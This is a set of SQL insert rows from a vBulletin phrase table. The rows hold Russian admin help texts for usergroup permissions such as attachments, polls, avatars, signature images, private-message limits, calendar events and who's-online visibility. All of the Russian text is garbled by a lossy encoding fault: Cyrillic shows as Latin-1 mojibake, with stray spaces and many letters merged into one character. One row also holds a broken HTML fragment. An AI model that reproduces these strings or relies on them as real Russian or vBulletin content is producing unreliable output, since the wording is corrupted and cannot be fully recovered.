(24584, -1, 'usergroup_add_edit_canpostattachment_text', 'cphelptext', 'Ôîðóì ïîçâîëÿåò ïîëüçîâà òåëÿì ïðèêðåïëÿòü ôà éëû ê ñîîáùåÃèÿì. Ãòî ðà çðåøåÃèå âêëþ÷èò âûøåóïîìÿÃóòóþ ôóÃêöèþ äëÿ ïîëüçîâà òåëåé äà ÃÃîé ãðóïïû. Ãîëüçîâà òåëè ìîãóò çà ãðóæà òü ôà éëû ïðè ïîìîùè êÃîïêè \"Óïðà âëåÃèå âëîæåÃèÿìè\" â ôîðìå îòïðà âêè ñîîáùåÃèé.', 'vbulletin', '', 0, ''),
(24585, -1, 'usergroup_add_edit_canpostattachment_title', 'cphelptext', 'Ìîæåò çà ãðóæà òü âëîæåÃèÿ', 'vbulletin', '', 0, ''),
(24586, -1, 'usergroup_add_edit_attachlimit_text', 'cphelptext', 'Ãîëüçîâà òåëè ýòîé ãðóïïû ÃÃ¥ ìîãóò ïðåâûøà òü ýòî îãðà Ãè÷åÃèå Ãà ñóììà ðÃûé ðà çìåð âñåõ âëîæåÃèé. Ââåäèòå çÃà ÷åÃèå â áà éòà õ. \r\n1048576 áà éò = 1 ìåãà áà éò', 'vbulletin', '', 0, ''),
(24587, -1, 'usergroup_add_edit_attachlimit_title', 'cphelptext', 'Ñóììà ðÃûé îáúåì (â áà éòà õ), êîòîðûé ïîëüçîâà òåëü ìîæåò èñïîëüçîâà òü äëÿ ñâîèõ âëîæåÃèé', 'vbulletin', '', 0, ''),
(24588, -1, 'usergroup_add_edit_canpostpoll_text', 'cphelptext', 'Ãòî ðà çðåøåÃèå äà åò âîçìîæÃîñòü ïîëüçîâà òåëÿì ýòîé ãðóïïû ñîçäà âà òü îïðîñû ïðè ñîçäà Ãèè Ãîâûõ òåì. Ãîëüçîâà òåëè ìîãóò ñîçäà òü îïðîñ ïðè ïîìîùè îïöèè \"Äà , äîáà âèòü îïðîñ ê ýòîé òåìå\" Ãà ñòðà Ãèöå ñîçäà Ãèÿ Ãîâîé òåìû. \r\nÄîïîëÃèòåëüÃî ñóùåñòâóþò Ãåñêîëüêî îïöèé óïðà âëåÃèÿ ãîëîñîâà Ãèÿìè â îñÃîâÃûõ Ãà ñòðîéêà õ ôîðóìà .', 'vbulletin', 'zCarot', 1205430879, '3.7.0 Release Candidate 1'),
(24589, -1, 'usergroup_add_edit_canpostpoll_title', 'cphelptext', 'Ìîæåò ñîçäà âà òü îïðîñû', 'vbulletin', '', 0, ''),
(24590, -1, 'usergroup_add_edit_canvote_text', 'cphelptext', 'Ãòî ðà çðåøåÃèå î÷åâèäÃî. Åñëè óñòà Ãîâèòü \"Ãåò\", ïîëüçîâà òåëè ýòîé ãðóïïû ÃÃ¥ ñìîãóò ãîëîñîâà òü â îïðîñà õ.', 'vbulletin', '', 0, ''),
(24591, -1, 'usergroup_add_edit_canvote_title', 'cphelptext', 'Ìîæåò ãîëîñîâà òü', 'vbulletin', '', 0, ''),
(24592, -1, 'usergroup_add_edit_canuseavatar_text', 'cphelptext', 'Ãòî ðà çðåøåÃèå äà ¸ò âîçìîæÃîñòü ïîëüçîâà òåëÿì ýòîé ãðóïïû çà ãðóæà òü ñâîè à âà òà ðû Ãà ñòðà Ãèöå ÈçìåÃèòü à âà òà ð â êà áèÃåòå ïîëüçîâà òåëÿ. Àâà òà ð áóäåò çà ãðóæåà ñ êîìïüþòåðà ïîëüçîâà òåëÿ èëè ñêà ÷à à ïî ââåä¸ÃÃîìó èì URL è áóäåò õðà Ãèòüñÿ Ãà ñåðâåðå. \r\n×òîáû ýòà ôóÃêöèÿ ðà áîòà ëà , à âà òà ðû äîëæÃû áûòü âêëþ÷åÃû â îñÃîâÃûõ Ãà ñòðîéêà õ ôîðóìà . Òà ì òà êæå èìåþòñÿ Ãåêîòîðûå äðóãèå îïöèè, êà ñà þùèåñÿ à âà òà ðîâ.', 'vbulletin', 'zCarot', 1205430879, '3.7.0 Release Candidate 1'),
(24593, -1, 'usergroup_add_edit_canuseavatar_title', 'cphelptext', 'Ìîæåò çà ãðóæà òü ñâîè à âà òà ðû ', 'vbulletin', '', 0, ''),
(24594, -1, 'usergroup_add_edit_avatarmaxwidth_text', 'cphelptext', 'Ââåäèòå ìà êñèìà ëüÃóþ øèðèÃó à âà òà ðà , êîòîðóþ ìîãóò èñïîëüçîâà òü ïîëüçîâà òåëè ýòîé ãðóïïû (â ïèêñåëÿõ).', 'vbulletin', '', 0, ''),
(24595, -1, 'usergroup_add_edit_avatarmaxwidth_title', 'cphelptext', 'Ìà êñèìà ëüÃà ÿ øèðèÃà à âà òà ðà (â ïèêñåëÿõ)', 'vbulletin', '', 0, ''),
(24596, -1, 'usergroup_add_edit_avatarmaxheight_text', 'cphelptext', 'Ââåäèòå ìà êñèìà ëüÃóþ âûñîòó à âà òà ðà , êîòîðóþ ìîãóò èñïîëüçîâà òü ïîëüçîâà òåëè ýòîé ãðóïïû (â ïèêñåëÿõ).', 'vbulletin', '', 0, ''),
(24597, -1, 'usergroup_add_edit_avatarmaxheight_title', 'cphelptext', 'Ìà êñèìà ëüÃà ÿ âûñîòà à âà òà ðà (â ïèêñåëÿõ)', 'vbulletin', '', 0, ''),
(24598, -1, 'usergroup_add_edit_avatarmaxsize_text', 'cphelptext', 'Ââåäèòå ìà êñèìà ëüÃûé ðà çìåð à âà òà ðà , êîòîðûå ìîãóò èñïîëüçîâà òü ïîëüçîâà òåëè ýòîé ãðóïïû. ÇÃà ÷åÃèå äîëæÃî áûòü ââåäåÃî â áà éòà õ. \r\n1024 áà éòà = 1 êèëîáà éò \r\n10240 áà éò = 10 êèëîáà éò \r\n51200 áà éò = 50 êèëîáà éò \r\n102400 áà éò = 100 êèëîáà éò', 'vbulletin', '', 0, ''),
(24599, -1, 'usergroup_add_edit_avatarmaxsize_title', 'cphelptext', 'Ìà êñèìà ëüÃûé ðà çìåð çà ãðóæà åìîãî à âà òà ðà (â áà éòà õ)', 'vbulletin', '', 0, ''),
(24600, -1, 'usergroup_add_edit_cansigpic_text', 'cphelptext', 'Îïðåäåëÿåò, ìîãóò ëè ïîëüçîâà òåëè ýòîé ãðóïïû çà ãðóæà òü èçîáðà æåÃèå, êîòîðîå áóäåò ïîìåùåÃî â èõ ïîäïèñè. Òðà ôèê ïðè çà ãðóçêå ýòîãî èçîáðà æåÃèÿ áóäåò òà êèì æå, êà ê è ïðè çà ãðóçêå äðóãèõ èçîáðà æåÃèé, Ãà õîäÿùèõñÿ Ãà âà øåì ñåðâåðå, Ãî, èñïîëüçóÿ îïöèè Ãèæå, âû ìîæåòå êîÃòðîëèðîâà òü ðà çìåðû çà ãðóæà åìûõ èçîáðà æåÃèé: åñëè ïîëüçîâà òåëü ïðîñòî óñòà Ãîâèò ññûëêó Ãà èçîáðà æåÃèå Ãà äðóãîì ñåðâåðå, òî êîÃòðîëèðîâà òü ÷òî-ëèáî áóäåò ÃåâîçìîæÃî.', 'vbulletin', 'zCarot', 1142519066, '3.6.0 Beta 1'),
(24601, -1, 'usergroup_add_edit_cansigpic_title', 'cphelptext', 'Ìîæåò çà ãðóæà òü èçîáðà æåÃèå ïîäïèñè', 'vbulletin', 'zCarot', 1142519066, '3.6.0 Beta 1'),
(24602, -1, 'usergroup_add_edit_cananimatesigpic_text', 'cphelptext', 'Åñëè ó ïîëüçîâà òåëåé äà ÃÃîé ãðóïïû åñòü ïðà âî çà ãðóæà òü èçîáðà æåÃèå ïîäïèñè ñ ïîìîùüþ îïöèè \"Ìîæåò çà ãðóæà òü èçîáðà æåÃèå ïîäïèñè\", òî çäåñü âû ìîæåòå îãðà Ãè÷èòü çà ãðóçêó à Ãèìèðîâà ÃÃûõ èçîáðà æåÃèé.', 'vbulletin', 'zCarot', 1142519066, '3.6.0 Beta 1'),
(24603, -1, 'usergroup_add_edit_cananimatesigpic_title', 'cphelptext', 'Ìîæåò çà ãðóæà òü à Ãèìèðîâà ÃÃîå èçîáðà æåÃèå ïîäïèñè', 'vbulletin', 'zCarot', 1142519066, '3.6.0 Beta 1'),
(24604, -1, 'usergroup_add_edit_canprofilepic_text', 'cphelptext', 'Ãòî ðà çðåøåÃèå äà ¸ò âîçìîæÃîñòü ïîëüçîâà òåëÿì ýòîé ãðóïïû çà ãðóæà òü ôîòîãðà ôèè äëÿ ïðîôèëÿ Ãà ñòðà Ãèöå Ãåäà êòèðîâà òü ïðîôèëü â êà áèÃåòå ïîëüçîâà òåëÿ. Ôîòîãðà ôèè çà ãðóæà þòñÿ ñ êîìïüþòåðà ïîëüçîâà òåëÿ èëè ñêà ÷èâà þòñÿ ïî ââåä¸ÃÃîìó èì URL è õðà Ãÿòñÿ Ãà ñåðâåðå. \r\nÔîòîãðà ôèè äîëæÃû áûòü âêëþ÷åÃû â îñÃîâÃûõ Ãà ñòðîéêà õ ôîðóìà , ÷òîáû ýòà óñòà Ãîâêà ðà áîòà ëà .', 'vbulletin', '', 0, ''),
(24605, -1, 'usergroup_add_edit_canprofilepic_title', 'cphelptext', 'Ìîæåò çà ãðóæà òü ôîòîãðà ôèè', 'vbulletin', '', 0, ''),
(24606, -1, 'usergroup_add_edit_sigpicmaxheight_text', 'cphelptext', 'Åñëè ó ïîëüçîâà òåëåé äà ÃÃîé ãðóïïû åñòü ïðà âî çà ãðóæà òü èçîáðà æåÃèå ïîäïèñè ñ ïîìîùüþ îïöèè \"Ìîæåò çà ãðóæà òü èçîáðà æåÃèå ïîäïèñè\", òî çäåñü âû ìîæåòå îãðà Ãè÷èòü ìà êñèìà ëüÃóþ âûñîòó èçîáðà æåÃèÿ â ïèêñåëÿõ. Óêà æèòå 0, ÷òîáû ñÃÿòü îãðà Ãè÷åÃèå.', 'vbulletin', 'zCarot', 1142519066, '3.6.0 Beta 1'),
(24607, -1, 'usergroup_add_edit_sigpicmaxheight_title', 'cphelptext', 'Ìà êñèìà ëüÃà ÿ âûñîòà èçîáðà æåÃèÿ ïîäïèñè (â ïèêñåëÿõ)', 'vbulletin', 'zCarot', 1142519066, '3.6.0 Beta 1'),
(24608, -1, 'usergroup_add_edit_sigpicmaxwidth_text', 'cphelptext', 'Åñëè ó ïîëüçîâà òåëåé äà ÃÃîé ãðóïïû åñòü ïðà âî çà ãðóæà òü èçîáðà æåÃèå ïîäïèñè ñ ïîìîùüþ îïöèè \"Ìîæåò çà ãðóæà òü èçîáðà æåÃèå ïîäïèñè\", òî çäåñü âû ìîæåòå îãðà Ãè÷èòü ìà êñèìà ëüÃóþ øèðèÃó èçîáðà æåÃèÿ â ïèêñåëÿõ. Óêà æèòå 0, ÷òîáû ñÃÿòü îãðà Ãè÷åÃèå.', 'vbulletin', 'zCarot', 1142519066, '3.6.0 Beta 1'),
(24609, -1, 'usergroup_add_edit_sigpicmaxwidth_title', 'cphelptext', 'Ìà êñèìà ëüÃà ÿ øèðèÃà èçîáðà æåÃèÿ ïîäïèñè (â ïèêñåëÿõ)', 'vbulletin', 'zCarot', 1142519066, '3.6.0 Beta 1'),
(24610, -1, 'usergroup_add_edit_profilepicmaxwidth_text', 'cphelptext', 'Ãòî ìà êñèìà ëüÃà ÿ øèðèÃà ôîòîãðà ôèè â ïðîôèëå ÷ëåÃîâ ýòîé ãðóïïû ïîëüçîâà òåëåé.', 'vbulletin', '', 0, ''),
(24611, -1, 'usergroup_add_edit_profilepicmaxwidth_title', 'cphelptext', 'Ìà êñèìà ëüÃà ÿ øèðèÃà ôîòîãðà ôèè (â ïèêñåëÿõ)', 'vbulletin', '', 0, ''),
(24612, -1, 'usergroup_add_edit_sigpicmaxsize_text', 'cphelptext', 'Åñëè ó ïîëüçîâà òåëåé äà ÃÃîé ãðóïïû åñòü ïðà âî çà ãðóæà òü èçîáðà æåÃèå ïîäïèñè ñ ïîìîùüþ îïöèè \"Ìîæåò çà ãðóæà òü èçîáðà æåÃèå ïîäïèñè\", òî çäåñü âû ìîæåòå îãðà Ãè÷èòü ìà êñèìà ëüÃûé ðà çìåð ôà éëà èçîáðà æåÃèÿ â áà éòà õ. Óêà æèòå 0, ÷òîáû ñÃÿòü îãðà Ãè÷åÃèå. \r\n \r\n1024 áà éòà = 1 êèëîáà éò \r\n10240 áà éò = 10 êèëîáà éò \r\n51200 áà éò = 50 êèëîáà éò \r\n102400 áà éò = 100 êèëîáà éò', 'vbulletin', 'zCarot', 1142519066, '3.6.0 Beta 1'),
(24613, -1, 'usergroup_add_edit_sigpicmaxsize_title', 'cphelptext', 'Ìà êñèìà ëüÃûé ðà çìåð ôà éëà èçîáðà æåÃèÿ ïîäïèñè (â áà éòà õ)', 'vbulletin', 'zCarot', 1142519066, '3.6.0 Beta 1'),
(24614, -1, 'usergroup_add_edit_profilepicmaxheight_text', 'cphelptext', 'Ãòî ìà êñèìà ëüÃà ÿ âûñîòà , êîòîðóþ ìîæåò èìåòü ôîòîãðà ôèÿ â ïðîôèëå ÷ëåÃà ýòîé ãðóïïû.', 'vbulletin', '', 0, ''),
(24615, -1, 'usergroup_add_edit_profilepicmaxheight_title', 'cphelptext', 'Ìà êñèìà ëüÃà ÿ âûñîòà ôîòîãðà ôèè (â ïèêñåëÿõ)', 'vbulletin', '', 0, ''),
(24616, -1, 'usergroup_add_edit_profilepicmaxsize_text', 'cphelptext', 'Ãòî ìà êñèìà ëüÃûé ðà çìåð ôîòîãðà ôèè â ïðîôèëå ÷ëåÃîâ ýòîé ãðóïïû. \r\n1024 áà éòà = 1 êèëîáà éò \r\n10240 áà éò = 10 êèëîáà éò \r\n51200 áà éò = 50 êèëîáà éò \r\n102400 áà éò = 100 êèëîáà éò', 'vbulletin', '', 0, ''),
(24617, -1, 'usergroup_add_edit_profilepicmaxsize_title', 'cphelptext', 'Ìà êñèìà ëüÃûé ðà çìåð ôà éëà ôîòîãðà ôèè (â áà éòà õ)', 'vbulletin', '', 0, ''),
(24618, -1, 'usergroup_add_edit_pmquota_text', 'cphelptext', 'Ãòà îïöèÿ îïðåäåëÿåò, ñêîëüêî ëè÷Ãûõ ñîîáùåÃèé ìîãóò èìåòü ÷ëåÃû ýòîé ãðóïïû â ñâîèõ ïà ïêà õ ëè÷Ãûõ ñîîáùåÃèé. Åñëè ïîëüçîâà òåëü äîñòèãÃåò ïðåäåëà , åìó ïîòðåáóåòñÿ óäà ëèòü Ãåñêîëüêî ËÑ, ïðåæäå ÷åì îà ñìîæåò ïîëó÷à òü Ãîâûå. \r\n Ëè÷Ãûå ñîîáùåÃèÿ äîëæÃû áûòü âêëþ÷åÃû â îñÃîâÃûõ Ãà ñòðîéêà õ ôîðóìà , ÷òîáû ýòà îïöèÿ èìåëà ñèëó. Ãà ýòîé æå ñòðà Ãèöå îñÃîâÃûõ Ãà ñòðîåê åñòü è äðóãèå îïöèè ëè÷Ãûõ ñîîáùåÃèé.', 'vbulletin', '', 0, ''),
(24619, -1, 'usergroup_add_edit_pmquota_title', 'cphelptext', 'Ìà êñèìà ëüÃîå êîëè÷åñòâî õðà Ãèìûõ ñîîáùåÃèé', 'vbulletin', '', 0, ''),
(24620, -1, 'usergroup_add_edit_canignorequota_text', 'cphelptext', 'Îïðåäåëÿåò, ìîãóò ëè ïîëüçîâà òåëè îòïðà âëÿòü ëè÷Ãûå ñîîáùåÃèÿ ïîëüçîâà òåëÿì, ó êîòîðûõ ïðåâûøåÃî ìà êñèìà ëüÃî äîïóñòèìîå êîëè÷åñòâî õðà Ãèìûõ ëè÷Ãûõ ñîîáùåÃèé.', 'vbulletin', 'zCarot', 1142519066, '3.6.0 Beta 1'),
(24621, -1, 'usergroup_add_edit_canignorequota_title', 'cphelptext', 'Ìîæåò îòïðà âëÿòü ËÑ ïîëüçîâà òåëÿì, ó êîòîðûõ äîñòèãÃóò ïðåäåë õðà Ãèìûõ ñîîáùåÃèé', 'vbulletin', 'zCarot', 1229013241, '3.8.0 Release Candidate 2'),
(24622, -1, 'usergroup_add_edit_cantrackpm_text', 'cphelptext', 'Îòñëåæèâà Ãèå ëè÷Ãûõ ñîîáùåÃèé äà ¸ò âîçìîæÃîñòü óçÃà âà òü î ïðî÷òåÃèè ËÑ à äðåñà òîì. Îòïðà âèòåëü áóäåò çÃà òü, ÷òî à äðåñà ò ïðî÷åë åãî ËÑ, åñëè ïîëó÷à òåëü ÃÃ¥ çà ïðåòèò óâåäîìëåÃèå îòïðà âèòåëÿ î ïðî÷òåÃèè. \r\nÄëÿ óñïåøÃîé ðà áîòû ýòîé ôóÃêöèè ëè÷Ãûå ñîîáùåÃèÿ äîëæÃû áûòü âêëþ÷åÃû â îñÃîâÃûõ Ãà ñòðîéêà õ ôîðóìà . Ãà çðåøåÃèå \"Ìà êñèìà ëüÃîå êîëè÷åñòâî ñîõðà Ãÿåìûõ ËÑ\" äîëæÃî áûòü òà êæå ïîëîæèòåëüÃûì ÷èñëîì äëÿ ïîëüçîâà òåëåé ýòîé ãðóïïû, ÷òîáû ýòà ôóÃêöèÿ ìîãëà ðà áîòà òü.', 'vbulletin', '', 0, ''),
(24623, -1, 'usergroup_add_edit_cantrackpm_title', 'cphelptext', 'Ìîæåò èñïîëüçîâà òü îòñëåæèâà Ãèå ñîîáùåÃèé', 'vbulletin', '', 0, ''),
(24624, -1, 'usergroup_add_edit_candenypmreceipts_text', 'cphelptext', 'Ãòî ðà çðåøåÃèå äà ¸ò âîçìîæÃîñòü ïîëüçîâà òåëÿì ýòîé ãðóïïû çà ïðåòèòü îòâåò Ãà çà ïðîñ î ïðî÷òåÃèè ËÑ. Òà ê îòïðà âèòåëü ìîæåò Ãèêîãäà è ÃÃ¥ óçÃà òü, ÷òî åãî ñîîáùåÃèå ïðî÷èòà Ãî ïîëó÷à òåëåì. \r\nËè÷Ãûå ñîîáùåÃèÿ äîëæÃû áûòü âêëþ÷åÃû â îñÃîâÃûõ Ãà ñòðîéêà õ ôîðóìà . Ãà çðåøåÃèå \"Ìà êñèìà ëüÃîå êîëè÷åñòâî ñîõðà Ãÿåìûõ ËÑ\" äîëæÃî áûòü òà êæå ïîëîæèòåëüÃûì ÷èñëîì äëÿ ïîëüçîâà òåëåé ýòîé ãðóïïû, ÷òîáû ýòà ôóÃêöèÿ ìîãëà ðà áîòà òü.', 'vbulletin', '', 0, ''),
(24625, -1, 'usergroup_add_edit_candenypmreceipts_title', 'cphelptext', 'Ìîæåò çà ïðåòèòü îòâåò Ãà çà ïðîñ î ïðî÷òåÃèè ËÑ', 'vbulletin', '', 0, ''),
(24626, -1, 'usergroup_add_edit_pmsendmax_text', 'cphelptext', 'Ãòà îïöèÿ îïðåäåëÿåò âîçìîæÃîñòè ìà ññîâîé ðà ññûëêè ËÑ äëÿ ýòîé ãðóïïû. ×ëåÃû ýòîé ãðóïïû ñìîãóò îòïðà âèòü ËÑ ìÃîãèì ëþäÿì çà îäèà ðà ç. \r\n Ëè÷Ãûå ñîîáùåÃèÿ äîëæÃû áûòü âêëþ÷åÃû â îñÃîâÃûõ Ãà ñòðîéêà õ , ÷òîáû ýòà îïöèÿ èìåëà ñèëó. ÇÃà ÷åÃèå îïöèè \"Ìà êñèìà ëüÃîå êîëè÷åñòâî õðà Ãèìûõ ñîîáùåÃèé\" (ïðåäûäóùà ÿ îïöèÿ) òà êæå äîëæÃî áûòü ïîëîæèòåëüÃûì ÷èñëîì äëÿ ÷ëåÃîâ ýòîé ãðóïïû, ÷òîáû îÃè ìîãëè èñïîëüçîâà òü âîçìîæÃîñòè ËÑ.', 'vbulletin', '', 0, ''),
(24627, -1, 'usergroup_add_edit_pmsendmax_title', 'cphelptext', 'Ìà êñèìà ëüÃîå êîëè÷åñòâî ïîëó÷à òåëåé äëÿ îòïðà âëÿåìîãî çà ðà ç ËÑ', 'vbulletin', '', 0, ''),
(24628, -1, 'usergroup_add_edit_canviewcalendar_text', 'cphelptext', 'Ãòî ðà çðåøåÃèå äà ¸ò âîçìîæÃîñòü ïîëüçîâà òåëÿì ýòîé ãðóïïû ïðîñìà òðèâà òü êà ëåÃäà ðü. \r\nÃòà ãðóïïà äîëæÃà òà êæå èìåòü ïðà âî ïðîñìà òðèâà òü ÃóæÃûå êà ëåÃäà ðè. Âû ìîæåòå ïðîâåðèòü ðà çðåøåÃèÿ äëÿ âà øèõ êà ëåÃäà ðåé çäåñü .', 'vbulletin', '', 0, ''),
(24629, -1, 'usergroup_add_edit_canviewcalendar_title', 'cphelptext', 'Ìîæåò ïðîñìà òðèâà òü êà ëåÃäà ðü', 'vbulletin', '', 0, ''),
(24630, -1, 'usergroup_add_edit_canpostevent_text', 'cphelptext', 'Ãòî ðà çðåøåÃèå äà ¸ò âîçìîæÃîñòü ïîëüçîâà òåëÿì ýòîé ãðóïïû ñîçäà âà òü ñîáûòèÿ â êà ëåÃäà ðå. \r\nÃòà ãðóïïà äîëæÃà òà êæå èìåòü ïðà âî ñîçäà âà òü ñâîè ñîáûòèÿ â ÃóæÃûõ êà ëåÃäà ðÿõ. Âû ìîæåòå ïðîâåðèòü ðà çðåøåÃèÿ äëÿ âà øèõ êà ëåÃäà ðåé çäåñü .', 'vbulletin', '', 0, ''),
(24631, -1, 'usergroup_add_edit_canpostevent_title', 'cphelptext', 'Ìîæåò ñîçäà âà òü ñîáûòèÿ', 'vbulletin', '', 0, ''),
(24632, -1, 'usergroup_add_edit_caneditevent_text', 'cphelptext', 'Ãòî ðà çðåøåÃèå äà ¸ò âîçìîæÃîñòü ïîëüçîâà òåëÿì ýòîé ãðóïïû ðåäà êòèðîâà òü ñâîè ñîáûòèÿ â êà ëåÃäà ðå. \r\nÃòà ãðóïïà äîëæÃà òà êæå èìåòü ïðà âî ðåäà êòèðîâà òü ñâîè ñîáûòèÿ â ÃóæÃûõ êà ëåÃäà ðÿõ. Âû ìîæåòå ïðîâåðèòü ðà çðåøåÃèÿ äëÿ âà øèõ êà ëåÃäà ðåé çäåñü .', 'vbulletin', '', 0, ''),
(24633, -1, 'usergroup_add_edit_caneditevent_title', 'cphelptext', 'Ìîæåò ðåäà êòèðîâà òü ñâîè ñîáûòèÿ', 'vbulletin', '', 0, ''),
(24634, -1, 'usergroup_add_edit_candeleteevent_text', 'cphelptext', 'Ãòî ðà çðåøåÃèå äà ¸ò âîçìîæÃîñòü ïîëüçîâà òåëÿì ýòîé ãðóïïû óäà ëÿòü ñâîè ñîáñòâåÃÃûå ñîáûòèÿ â êà ëåÃäà ðå. \r\nÃòà ãðóïïà äîëæÃà òà êæå èìåòü ïðà âî óäà ëÿòü ñâîè ñîáûòèÿ â ÃóæÃûõ êà ëåÃäà ðÿõ. Âû ìîæåòå ïðîâåðèòü ðà çðåøåÃèÿ äëÿ âà øèõ êà ëåÃäà ðåé çäåñü .', 'vbulletin', '', 0, ''),
(24635, -1, 'usergroup_add_edit_candeleteevent_title', 'cphelptext', 'Ìîæåò óäà ëÿòü ñâîè ñîáûòèÿ', 'vbulletin', '', 0, ''),
(24636, -1, 'usergroup_add_edit_canviewothersevent_text', 'cphelptext', 'Ãòî ðà çðåøåÃèå äà ¸ò âîçìîæÃîñòü ïîëüçîâà òåëÿì ýòîé ãðóïïû ïðîñìà òðèâà òü ñîáûòèÿ, äîáà âëåÃÃûå â êà ëåÃäà ðü äðóãèìè ïîëüçîâà òåëÿìè. Åñëè ýòî ðà çðåøåÃèå âûêëþ÷åÃî, ïîëüçîâà òåëè ýòîé ãðóïïû áóäóò âèäåòü òîëüêî ñâîè ñîáûòèÿ. \r\nÃòà ãðóïïà äîëæÃà òà êæå èìåòü ïðà âî ïðîñìà òðèâà òü ñîáûòèÿ äðóãèõ ïîëüçîâà òåëåé â ÃóæÃûõ êà ëåÃäà ðÿõ. Âû ìîæåòå ïðîâåðèòü ðà çðåøåÃèÿ äëÿ âà øèõ êà ëåÃäà ðåé çäåñü .', 'vbulletin', '', 0, ''),
(24637, -1, 'usergroup_add_edit_canviewothersevent_title', 'cphelptext', 'Ìîæåò ïðîñìà òðèâà òü ñîáûòèÿ äðóãèõ', 'vbulletin', '', 0, ''),
(24638, -1, 'usergroup_add_edit_canwhosonline_text', 'cphelptext', 'Ãòî ðà çðåøåÃèå äà ¸ò âîçìîæÃîñòü ïîëüçîâà òåëÿì ýòîé ãðóïïû ïðîñìà òðèâà òü ñòðà Ãèöó online.php . Ãòà ñòðà Ãèöà ïîêà çûâà åò äåòà ëèçèðîâà ÃÃûé ñïèñîê òåêóùèõ à êòèâÃûõ ïîëüçîâà òåëåé, èõ ìåñòîÃà õîæäåÃèå è ò.ä. Ãòî ðà çðåøåÃèå îòÃîñèòñÿ òîëüêî ê online.php, à ÃÃ¥ ê ñïèñêó \"Êòî Ãà ôîðóìå\" Ãà options[forumhome]}.php\" target=\"_blank\">ãëà âÃîé ñòðà Ãèöå ôîðóìà . \r\nÎòîáðà æà åìûå ìåñòîïîëîæåÃèÿ ïî ðà çäåëà ì ó÷èòûâà þò ïðà âà ïîëüçîâà òåëåé Ãà ïðîñìîòð ýòèõ ðà çäåëîâ. Ãà ïðèìåð, åñëè ïîëüçîâà òåëü ïûòà åòñÿ ïðîñìà òðèâà òü ðà çäåë, ê êîòîðîìó ó Ãåãî Ãåò äîñòóïà , îà áóäåò îòîáðà æåà â ñïèñêå \"Ãðèñóòñòâóþò\", îäÃà êî online.php ïîêà æåò òîëüêî òî, ÷òî îà Ãà õîäèòñÿ Ãà ôîðóìå, ÃÃ¥ óêà çûâà ÿ â êà êîì ðà çäåëå. \r\nÑòðà Ãèöà \"Êòî Ãà ôîðóìå\" äîëæÃà áûòü âêëþ÷åÃà â îñÃîâÃûõ Ãà ñòðîéêà õ ôîðóìà , èÃà ÷å ýòà îïöèÿ ÃÃ¥ áóäåò ðà áîòà òü. Òà ì æå Ãà õîäÿòñÿ Ãåêîòîðûå äîïîëÃèòåëüÃûå Ãà ñòðîéêè ñïèñêà \"Êòî Ãà ôîðóìå\".', 'vbulletin', '', 0, ''),
(24639, -1, 'usergroup_add_edit_canwhosonline_title', 'cphelptext', 'Ìîæåò âèäåòü, êòî Ãà ôîðóìå', 'vbulletin', '', 0, ''),
(24640, -1, 'usergroup_add_edit_canwhosonlinefull_text', 'cphelptext', 'Ãîçâîëÿåò ïîëüçîâà òåëþ âèäåòü äåòà ëüÃóþ èÃôîðìà öèþ äëÿ Ãåêîòîðûõ äåéñòâèé Ãà ôîðóìå. Ãà ïðèìåð, åñëè Ãåêîòîðûé ïîëüçîâà òåëü îòñûëà åò ëè÷Ãîå ñîîáùåÃèå, òî ïîëüçîâà òåëü ýòîé ãðóïïû ñìîæåò óâèäåòü, êîìó èìåÃÃî ýòîò ïîëüçîâà òåëü îòïðà âëÿåò åãî. Åñëè îáúåêò ïðîñìà òðèâà åò ïðîôèëü ïîëüçîâà òåëÿ, òî ïîëüçîâà òåëü ñìîæåò óçÃà òü êòî ýòî.', 'vbulletin', '', 0, ''),
(24641, -1, 'usergroup_add_edit_canwhosonlinefull_title', 'cphelptext', 'Ìîæåò âèäåòü äåòà ëüÃóþ èÃôîðìà öèþ î ìåñòîïîëîæåÃèè ïîëüçîâà òåëåé', 'vbulletin', '', 0, ''),
(24642, -1, 'usergroup_add_edit_canwhosonlineip_text', 'cphelptext', 'Ãòî ðà çðåøåÃèå äà ¸ò âîçìîæÃîñòü ïîëüçîâà òåëÿì ýòîé ãðóïïû âèäåòü IP-à äðåñà òåêóùèõ à êòèâÃûõ ïîëüçîâà òåëåé Ãà ñòðà Ãèöå online.php . \r\nÑòà Ãèöà \"Êòî Ãà ôîðóìå\" äîëæÃà áûòü âêëþ÷åÃà â îñÃîâÃûõ Ãà ñòðîéêà õ ôîðóìà , èÃà ÷å ýòà îïöèÿ ÃÃ¥ áóäåò ðà áîòà òü. Òà êæå äîëæÃà áûòü âêëþ÷åÃà îïöèÿ \"Ìîæåò âèäåòü, êòî Ãà ôîðóìå\".', 'vbulletin', '', 0, ''),
(24643, -1, 'usergroup_add_edit_canwhosonlineip_title', 'cphelptext', 'Ìîæåò âèäåòü IP-à äðåñ', 'vbulletin', '', 0, ''),
(24644, -1, 'usergroup_add_edit_canwhosonlinebad_text', 'cphelptext', 'Åñëè ýòî ðà çðåøåÃèå âûêëþ÷åÃî, òî ïðè ïîñåùåÃèè Ãåêîòîðûì ïîëüçîâà òåëåì Ãåïðà âèëüÃîé ññûëêè èëè åñëè Ãåêîòîðûé ïîëüçîâà òåëü ÃÃ¥ èìååò ïðà âà Ãà å¸ ïîñåùåÃèå, òî ïîëüçîâà òåëþ áóäåò ñêà çà Ãî, ÷òî ýòîò ïîëüçîâà òåëü Ãà õîäèòñÿ Ãà ãëà âÃîé ñòðà Ãèöå ôîðóìà .', 'vbulletin', '', 0, ''),
(24645, -1, 'usergroup_add_edit_canwhosonlinebad_title', 'cphelptext', 'Ìîæåò âèäåòü äåòà ëüÃóþ èÃôîðìà öèþ î ïîëüçîâà òåëÿõ, êîòîðûå çà ïðà øèâà þò Ãåñóùåñòâóþùóþ/Ãåðà çðåøåÃÃóþ ê ïðîñìîòðó èÃôîðìà öèþ', 'vbulletin', '', 0, ''),
